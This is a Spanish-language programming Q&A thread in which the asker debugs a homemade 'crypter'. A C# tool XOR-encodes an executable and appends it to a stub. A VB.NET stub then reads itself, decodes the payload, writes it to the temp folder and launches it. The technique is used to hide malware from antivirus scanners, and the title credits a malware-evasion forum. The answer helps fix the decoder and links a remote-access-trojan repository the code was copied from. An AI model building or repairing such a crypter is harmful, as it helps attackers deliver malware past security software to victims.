# Error alocación de memoria, el programa se detuvo - VB.NET - C#

Tags: c#, vb.net

Hola estoy intentando hacer una pequeña aplicación, que encripta y luego desencripta mi fichero, en principio, mi encriptador, esta hecho en C#, pero luego estoy intentando desencriptar mi fichero(en VB.NET) y cuando lo abro me arroja el siguiente error:
[image: Fichero]
El encriptador:

```
using System;
using System.Text;
using System.IO;
using System.Linq;
using System.Windows.Forms;
namespace Crypter
{
    class Program
    {
        [STAThread]
        static void Main(string[] args)
        {
            OpenFileDialog FileDlg = new OpenFileDialog();
            FileDlg.Filter = "(*.exe)|*.exe";
            FileDlg.Title = "SimplisimoCrypter by Blau [Indetectables.net]";
            FileDlg.Multiselect = false;

            if (FileDlg.ShowDialog() == DialogResult.OK)
            {
            string InputFile = FileDlg.FileName;
                if (!File.Exists(InputFile))
                {
                    MessageBox.Show("File does not exists.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
                    return;
                }   
            //No Arguments -> Exit
            /*if (args.Length < 2)
            {
                Console.WriteLine("Syntax: crypter.exe <Exe/Dll to get Encrypted> <Password> (Optional: output file name)");
                Environment.Exit(0);
            }*/

            //String file = args[0];
            String file = InputFile;
            //String pass = args[1];
            String pass = "1234";
            String outFile = "Crypted.exe";

            //If Output Name is specified -> Set it
            if (args.Length == 3)
            {
                outFile = args[2];
            }

            //File doesn't exist -> Exit
            if (!File.Exists(file))
            {
                Console.WriteLine("[!] The selected File doesn't exist!");
                Environment.Exit(0);
            }

            //Everything seems fine -> Reading bytes
            Console.WriteLine("[*] Reading Data...");
            byte[] plainBytes = File.ReadAllBytes(file);

            //Yep, got bytes -> Encoding
            Console.WriteLine("[*] Encoding Data...");
            byte[] encodedBytes = encodeBytes(plainBytes, pass);
            //byte[] encodedBytes = plainBytes;

            Console.WriteLine("[*] Save to Output File... ");

            //Leer el stub
            Console.WriteLine("[*] Reading Stub...");
            byte[] Stub = File.ReadAllBytes("Stub.exe");

            //byte separador
            string strseperate = "BLAUMOLAMUCHO";
            byte[] toBytes = Encoding.ASCII.GetBytes(strseperate);

            var s = new MemoryStream();
            s.Write(Stub, 0, Stub.Length);
            s.Write(toBytes, 0, toBytes.Length);
            s.Write(encodedBytes, 0, encodedBytes.Length);
            var b3 = s.ToArray();
            Stream stream = new MemoryStream(b3);

            FileStream fileStream = new FileStream(@"Crypted.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < stream.Length; i++)
                fileStream.WriteByte((byte)stream.ReadByte());

            Console.WriteLine("Done!");

            Console.WriteLine("\n[*] File successfully encoded!");
            }
        }
        private static byte[] encodeBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}
```

El desencriptador:

```
Imports System.Security.Cryptography
Imports System.IO
Imports System.Text
Imports System.Runtime.InteropServices
Imports System.Reflection.Assembly

Module Program
    Public Sub Main()
        Dim s As String = GetExecutingAssembly.GetCallingAssembly.Location
        Dim myBytes As Byte() = My.Computer.FileSystem.ReadAllBytes(s)

        Dim Blau As Byte()  = XORR("1234", myBytes)
        My.Computer.FileSystem.WriteAllBytes(System.IO.Path.GetTempPath & "temp1928.exe", Blau, False)
        Process.Start(System.IO.Path.GetTempPath & "temp1928.exe")
        Console.WriteLine(s)

        Console.ReadKey()
    End Sub

    'Funcion para deshacer el método XOR
    Public Function XORR(ByVal CodeKey As String, ByVal DataIn As Byte()) As String
    Dim lonDataPtr As Long
    Dim strDataOut As String
    Dim intXOrValue1 As Integer
    Dim intXOrValue2 As Integer
    For lonDataPtr = 1 To Len(DataIn)
        intXOrValue1 = Asc(Mid$(DataIn, lonDataPtr, 1))
        intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr - 1) Mod Len(CodeKey)) + 1, 1))
        strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
    Next lonDataPtr
    Return strDataOut
    End Function


End Module
```

El problema esta en mi desencriptador, no sé porque cuando lo hago no desencripta mi fichero correctamente, ya que lo hice exactamente como me explicaron en c# pero en esta ocasión para vb.net.

Answer (score 0):

Para simplificar he cambiado el encriptador para que obtenga los bytes del password con:

```
byte[] XorBytes = Encoding.ASCII.GetBytes(pass);
```

De esta manera cada carácter del password es un byte y requiere menos modificación de tu código. Si realmente se necesita UTF-8 faltaría adaptar el desencriptador para que trabaje a nivel de byte.

El código parece copiado de [un programa](https://github.com/malwares/Remote-Access-Trojan/blob/master/ShadowTechRAT/ShadowTech%20Rat/ShadowTech%20Rat/Encryption.vb) que usa otro encriptador, por lo que necesita alguna modificación para funcionar con el de C# :

```
Public Function XORR(ByVal CodeKey As String, ByVal DataIn As String) As String
    Dim lonDataPtr As Long
    Dim strDataOut As String
    Dim intXOrValue1 As Integer
    Dim intXOrValue2 As Integer
    For lonDataPtr = 1 To Len(DataIn)
        intXOrValue1 = Asc(Mid$(DataIn, lonDataPtr, 1))
        intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr - 1) Mod Len(CodeKey)) + 1, 1))
        strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
    Next lonDataPtr
    Return strDataOut
End Function
```

Comment: Actualice el post, por si pudieras ponerlo como bytes, es decir tendrá la key es string, y DataIN los bytes.

Comment: Seguro que necesitáis que el password pueda ser UTF-8? Piensa que si se usan 2 bytes por carácter, pero el XOR se hace byte a byte, en la gran mayoría de los casos estarás haciendo XOR contra 0x00 ya que los caracteres básicos no usan los dos bytes.

Comment: No entiendo porque dices UTF-8 ? en lugar de ASCII? yo dije que en lugar de poner string en ByVal DataIn As String que fuera bytes ya que si convierto los bytes a string se rompen. Por lo que actualice el post con el código, se como sería en c# en vb no tengo ni idea.

Comment: prefiero ASCII pero lo que quería erá poner los datos en bytes.